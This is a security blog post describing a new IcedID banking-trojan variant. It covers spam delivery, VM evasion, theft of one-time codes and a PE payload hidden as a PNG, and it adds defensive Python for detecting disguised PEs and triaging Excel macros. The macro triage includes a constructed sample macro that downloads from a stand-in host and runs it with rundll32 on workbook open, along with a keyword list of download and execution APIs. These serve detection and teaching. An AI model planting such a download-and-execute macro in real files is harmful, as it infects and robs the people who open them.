David Morán Sep 13, 2021 9 min read

New Spam Campaigns with a Variant of IcedID

Email spam campaigns are one of the most widely used ways for attackers to deliver banking trojans to users. Today we are looking at a campaign observed by Kaspersky researchers, in which messages written in English carry ZIP attachments, or links that lead to the download of such files.

These files carry a new variant of the IcedID banking trojan, an update of the version first seen in 2017. The trojan targets Windows only; while earlier versions were compiled for 32-bit systems, the new one appears to be compiled for both 32-bit and 64-bit systems, widening its reach.

Kaspersky reports that detections of the IcedID trojan have exceeded 100 per day. China is the main target of this campaign, but there have also been detections in other countries such as India, Italy, the United States and Germany.



Geography of IcedID downloader detections. Source: Kaspersky.



IcedID (Trojan-Banker.Win32.IcedID), also known as BokBot, shares similarities with Emotet, malware that started out as a banking trojan and evolved thanks to its modular design. This new variant of IcedID can detect virtual machines. That matters to the attackers: they want to reach as many devices as possible, but only those where they can achieve their objective of obtaining users' banking information, and an analyst's sandbox or virtual machine is not one of them.

Another of IcedID's characteristics is that it uses web injections to steal one-time authentication codes, allowing the criminals to bypass two-step authentication and compromise a user's bank account. They do not need access to any of the user's other devices: the infected computer is all they need, because the code is captured in the browser when the victim types it into the injected page.


Changes From the Previous Version

The IcedID banking trojan has been given a new downloader, which sends information collected from the victim's machine, such as the username, the MAC address and the Windows version, to the command and control (C2) server. In response, the server sends back the payload containing the trojan.


Configuration of the new downloader. Source: Kaspersky.

In earlier versions of the trojan, the downloader was compiled as an x86 executable and its configuration contained fake command and control addresses, to make the samples harder for analysts to study. In the new version the executable has been compiled for x86-64, and the fake addresses have been removed from the configuration.

The attackers have also modified the main IcedID payload. It is still delivered as an image with a PNG extension, but what the file actually contains is a PE (Portable Executable) file, with the downloader-related data placed at the beginning, instead of the shellcode hidden inside the image in the previous version. The decryption routine and the communication methods with the command and control server remain unchanged.

The downloader extracts the main IcedID payload from the PNG image, decrypts it in memory and executes the binary. From that point the trojan can start using web injections and exfiltrating data to the command and control server.
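As an added example (not code from the original post or from Kaspersky's analysis), the following Python triage check looks for the header mismatch described above: a file delivered with a .png extension that is in fact a PE, or that carries a cleartext PE somewhere inside it. It also reads the Machine field of the COFF header, which is how you tell an x86 build from an x86-64 build when comparing old and new downloader samples. The sample inputs are constructed stand-ins and do not reproduce the real payload layout. One caveat: the post says the payload is decrypted in memory, so an encrypted payload will not match this check until it has been decrypted with the downloader's own routine; the check is for the renamed or appended cleartext case.

```python
import struct
import sys

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
MZ_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\0\0"

# IMAGE_FILE_HEADER.Machine values from the PE/COFF specification.
MACHINE_NAMES = {0x014C: "x86", 0x8664: "x86-64"}


def parse_pe_machine(data: bytes, offset: int = 0):
    """Return the architecture of a PE image whose DOS header starts at
    `offset`, or None if there is no structurally valid MZ/PE header there.
    Validating e_lfanew and the 'PE\\0\\0' signature avoids flagging a stray
    'MZ' that happens to occur inside genuine image data."""
    if data[offset:offset + 2] != MZ_MAGIC or len(data) < offset + 0x40:
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, offset + 0x3C)
    pe = offset + e_lfanew
    if data[pe:pe + 4] != PE_SIGNATURE or len(data) < pe + 6:
        return None
    (machine,) = struct.unpack_from("<H", data, pe + 4)
    return MACHINE_NAMES.get(machine, "unknown(0x%04x)" % machine)


def classify_png_file(data: bytes) -> dict:
    """Classify the contents of a file that arrived with a .png extension:
    is it really a PNG, and is there a PE header at the start or embedded later?"""
    result = {"valid_png": data.startswith(PNG_MAGIC), "pe_offset": None, "machine": None}
    pos = data.find(MZ_MAGIC)
    while pos != -1:
        machine = parse_pe_machine(data, pos)
        if machine is not None:
            result["pe_offset"] = pos
            result["machine"] = machine
            break
        pos = data.find(MZ_MAGIC, pos + 1)
    return result


def build_fake_pe(machine: int) -> bytes:
    """Constructed fixture: the smallest byte layout that parse_pe_machine
    accepts (DOS header with e_lfanew, then the PE signature and a zeroed
    COFF header carrying only the Machine field). It is not an executable
    and merely stands in for a real sample."""
    dos = bytearray(0x40)
    dos[0:2] = MZ_MAGIC
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header follows the DOS header
    coff = PE_SIGNATURE + struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, 0)
    return bytes(dos) + coff


# Constructed inputs (not real IcedID samples).
SAMPLE_PE_AS_PNG = build_fake_pe(0x8664)  # a 64-bit PE simply renamed to .png
SAMPLE_REAL_PNG = (PNG_MAGIC + b"\x00\x00\x00\x0dIHDR"
                   + b"MZ" + b"\x00" * 80)  # benign image data that contains a stray "MZ"
SAMPLE_PNG_WITH_PE = PNG_MAGIC + b"\x00" * 16 + build_fake_pe(0x014C)  # 32-bit PE after a PNG header


if __name__ == "__main__":
    paths = sys.argv[1:]
    if paths:
        for path in paths:
            with open(path, "rb") as fh:
                print(path, classify_png_file(fh.read()))
    else:
        for name in ("SAMPLE_PE_AS_PNG", "SAMPLE_REAL_PNG", "SAMPLE_PNG_WITH_PE"):
            print(name, classify_png_file(globals()[name]))
```

Run it with one or more file paths to classify real files; with no arguments it classifies the three constructed samples. The e_lfanew and signature validation is what keeps the stray "MZ" in SAMPLE_REAL_PNG from being reported as a hit.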

The IcedID downloader has also been seen delivered through Microsoft Excel files whose macros contain the URLs from which the trojan payload is downloaded.
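As an added example, not part of the original post or of any tool it mentions, here is a small Python triage routine for the Excel lure: it takes the VBA source of a macro (as dumped by a macro extractor such as olevba from oletools), undoes the string concatenation and line continuation commonly used to split a download URL across several literals, and reports the URLs, the download and execution APIs, and the auto-run entry points it finds. The macro text, its hostname and the API combination are constructed for the example and do not reproduce a real IcedID lure.

```python
import re

# Entry points that run a macro without the user doing anything beyond opening the file.
AUTO_EXEC = ("Workbook_Open", "Auto_Open", "AutoOpen", "Document_Open")
# APIs and objects typically used to fetch and launch a second stage.
SUSPICIOUS_CALLS = ("URLDownloadToFile", "XMLHTTP", "ADODB.Stream", "WScript.Shell",
                    "Shell(", "CreateObject", "Environ(", "rundll32", "regsvr32")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
LINE_CONT_RE = re.compile(r"\s_\r?\n\s*")   # VBA line continuation: trailing " _"
CONCAT_RE = re.compile(r"\"\s*&\s*\"")       # "abc" & "def"  ->  "abcdef"


def normalize_strings(vba: str) -> str:
    """Join literal fragments so a URL split over several strings and lines
    becomes a single literal that the URL regex can see."""
    text = LINE_CONT_RE.sub(" ", vba)
    prev = None
    while prev != text:                      # repeat until no "x" & "y" pairs remain
        prev, text = text, CONCAT_RE.sub("", text)
    return text


def triage_macro(vba: str) -> dict:
    """Return the URLs, suspicious API use, auto-exec entry points and a verdict."""
    text = normalize_strings(vba)
    lowered = text.lower()
    urls = sorted(set(URL_RE.findall(text)))
    calls = [c for c in SUSPICIOUS_CALLS if c.lower() in lowered]
    auto = [a for a in AUTO_EXEC if a.lower() in lowered]
    if urls and calls and auto:
        verdict = "suspicious"   # fetches something from the network and runs on open
    elif urls or calls:
        verdict = "review"
    else:
        verdict = "clean"
    return {"urls": urls, "suspicious_calls": calls, "auto_exec": auto, "verdict": verdict}


# Constructed macro text (hostname and layout invented for the example).
SAMPLE_VBA = '''Private Sub Workbook_Open()
    Dim u As String, p As String
    u = "http://cdn.examp" & _
        "le.invalid/files/" & "report.png"
    p = Environ("TEMP") & "\\report.png"
    Call URLDownloadToFile(0, u, p, 0, 0)
    Shell "rundll32 " & p & ",#1", vbHide
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_VBA = '''Sub FormatReport()
    Range("A1").Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, src in (("SAMPLE_VBA", SAMPLE_VBA), ("BENIGN_VBA", BENIGN_VBA)):
        print(name, triage_macro(src))
```

The normalization step is the part worth keeping: a URL regex run over the raw macro text would see only "http://cdn.examp" and miss the host entirely, which is exactly why lures split their strings. Keyword matching is deliberately simple; it is a first-pass filter for deciding which attachments to detonate, not a replacement for a sandbox.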



To evade the signatures that detect trojans like IcedID, attackers modify the malware payload. In this case, although the trojan has been in circulation for several years, the way IcedID behaves has changed: anti-analysis techniques have been added to the code so that, when it detects that it is running in a virtual machine, it carries out none of the malicious activity it implements. A sample that does nothing in an ordinary sandbox is easy to misclassify as harmless, so dynamic analysis of these samples needs a sandbox that hides its virtualization artifacts, or a bare-metal host.

In addition, given the number of daily infections Kaspersky detects, it is important to make users aware of how careful they should be with the links they click and the files they download, as they can easily become victims of this type of banking trojan.


Indicators of Compromise

The indicators of compromise found in different samples of this trojan are the MD5 hashes of the lure files, listed by delivery method.

From Excel files with macros.

From ZIP documents.

David Morán

David has more than 15 years' experience in cybersecurity, systems and development, starting out in a now-defunct hacking team known as Badchecksum. He collaborated at Defcon 19 with the Painsec security team. He is well versed in scalable environments thanks to his work at the Tuenti social network, with a traffic load of over 12 Gbps. He has been involved with buguroo almost since the outset and has taken part in all the tools developed by the company, including source code analysers, malware analysis, cyber intelligence, etc. He also has in-depth knowledge of the Linux kernel, having developed LKMs that acted as rootkits, as well as malware for Windows environments. He is currently the head of Revelock's development team, managing task distribution and negotiating with the Head of Technology.